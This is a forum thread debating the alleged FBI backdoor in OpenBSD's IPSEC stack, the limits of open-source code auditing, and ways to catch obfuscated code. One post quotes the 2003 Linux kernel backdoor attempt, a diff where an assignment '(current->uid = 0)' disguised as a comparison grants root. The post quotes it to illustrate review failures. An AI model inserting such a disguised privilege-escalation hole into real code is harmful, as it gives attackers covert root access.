FBI Alleged To Have Backdoored OpenBSD's IPSEC Stack

Who can tell you no FreeBSD guys've done the same thing?
The linux ones? NetBSD?
Only non-affected system could be, err, plan9, just cause of its popularity :)
 
One of the great selling points of open source software is that the code is public, it's viewed, reviewed, and audited by any number of persons, and theoretically such a backdoor couldn't conceivably exist (for 10 years!). My guess is Theo panicked by writing such an email. Or did he? I'd have expected a GPG-signed email. Anyway the burden is probably on the OpenBSD team to prove their product is secure by default, not those being accused. Loss of confidence in any cryptographic algorithm could have real bad consequences world-wide.
 
Its not confirmed yet from OpenBSD maintainer, but they still in progress auditing the stack place from IPSECS. You can check it IPSEC stack here http://bit.ly/dSs4vV. Based on that email, the location are in the stack vector, so in FreeBSD the stack vector are here http://bit.ly/dUTiiu and it seems that those source are different. But thats only based on the email wich is inform that the backdoor are on IPSEC stack.
 
qsecofr said:
My guess is Theo panicked by writing such an email.

I doubt that very much. He probably wrote the e-mail because he knew that if he didn't, and someone came forwarded publicly, making those same claims, and saying that they already notified Theo, everyone would accuse him of trying to cover it up.

Adam
 
Exactly. Treat it like 'any other bug' and fess up. Simple as that.
 
nekoexmachina said:
And could be obfuscated enough to put there some code you would not want to run.

Not to belabor this point too much, but it's exactly right. Even Bourne shell scripts can be obfuscated to the extent that they're almost impossible for a human to interpret. (Seriously - I've inherited some wonderful examples.) Imagine the type of crud you can mask in complex C code.
 
anomie said:
Not to belabor this point too much, but it's exactly right. Even Bourne shell scripts can be obfuscated to the extent that they're almost impossible for a human to interpret. (Seriously - I've inherited some wonderful examples.) Imagine the type of crud you can mask in complex C code.

Ye, I've seen sh script (and howto for that matter [Don't have link any more]) that was obscured asm code
 
qsecofr said:
One of the great selling points of open source software is that the code is public, it's viewed, reviewed, and audited by any number of persons
It CAN be audited, but..
For excample this linux backdoor attempt was almost done in 2003. This patch was dropped because signature missmatch, buf if a commiter can upprove this ?
Code:
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
This is backdoor and it differs from normal code by 1byte. Sure it can be viewed, reviewed, and audited by any number of persons, but...
 
I may have an interpretation of "audit" that is all my own then. :) I'd like to think that not only is the code audited for bugs, but it is audited for achieving its purpose.

Not to say that mistakes can't be made. It's the nature of the business. In which case find/fix/patch followed by security advisory seems appropriate.. Once proven found, that is.

Dishonesty among commiters seems more an organization & operational issue. More stringent auditing might help deter that.

Regarding the original external link, I still think it's OpenBSD's responsibility to protect their brand. The suggestion that the accused should somehow prove their innocense seems an abdication of responsibility in my opinion. In my ignorance I don't really know if Theo represents the OpenBSD team in any capacity. But if so, I'd suggest PGP-signed emails if sent as official communications of the group.

Trust will probably become one of the big issues in IT. If it isn't already. I mean with all the spam, I don't even trust emails from my own mother unless they're PGP-signed. :)
 
Report of FBI back door roils OpenBSD community.

Hello everyone.

First of all wish you a Merry Christmas and a Happy New Year.

A couple of days ago I came across this news in a forum Informatica, and I take the hands to the head.:(:(:(:(

Source: http://news.cnet.com/8301-31921_3-20025767-281.html?tag=topStories1

OpenBSD (an open source operating system with rear doors).
I know that OpenBSD and FreeBSD are not the same, but ...
What do you think about it?
Something similar would be possible in FreeBSD?
Is there no one to monitor the source code?



Thanks for your time.

Bye bye.

P. S. Presuppose the truth of the assertion of the existence of those backdoors.
 
bes said:
Gregory Perry - John Young correspondence published on Cryptome.org


Wow that post was a trip. Especially this link: http://mickey.lucifier.net/b4ckd00r.html . That is the exact stuff conspiracy theories are made of. Where is the tin-foil hat smilie? An OpenBSD hacker was talking about intelligence agents from the Navy and FBI telling him to keep his mouth shut over OpenBSD. This stuff has been going on since early '90s! Incredible.

Well obviously there are "feds in your systems."

Privacy is important. Also, catching tourists is important too, but citizens civil (and human) right to privacy is of higher priority than catching tourists.

Firstly, I say we use the nature of open source software to uproot them from our systems. We need to do a full code audit of the secure kernel.

Secondly, strict coding and format rules should be devised so as to prevent the insertion of obfuscated code. Coding standards exist for most free software projects today, but these special set of rules will be structured in such a way as to highlight "devious and obfuscate code" or code that does not make it obvious to what it is doing.

Thirdly, we have a "chieftan" or "a roundtable of chieftans" that are switched yearly to review each and every piece of code on a certain part of the system; core of the kernel, networking, IPSEC stuff, etc. Debates, investigations, and discussions will be had before any suspected code is let loose.

Fourthly, I say a website be created that scrolls recently added code on a screen for at least 3 months. Then each day, a piece of code is picked from the screen and inspected for nefariousness.

Fifthly, create a code auditing suite of analysis apps that find obfuscated code, or code that is suspected of being obfuscated. Data analysis is being applied to everything today. Why not apply it to some C files?
 
Alt said:
lockfile this will not help against fbi. They are way powerful than you can imagine..

Yes you are right. The FBI should be looking out for Americans' interests, not suppressing them.

I recently read that your PM Putin just ordered the government to put critical system on Linux. I was surprised to hear that they were not already! That is good news.
 
Back
Top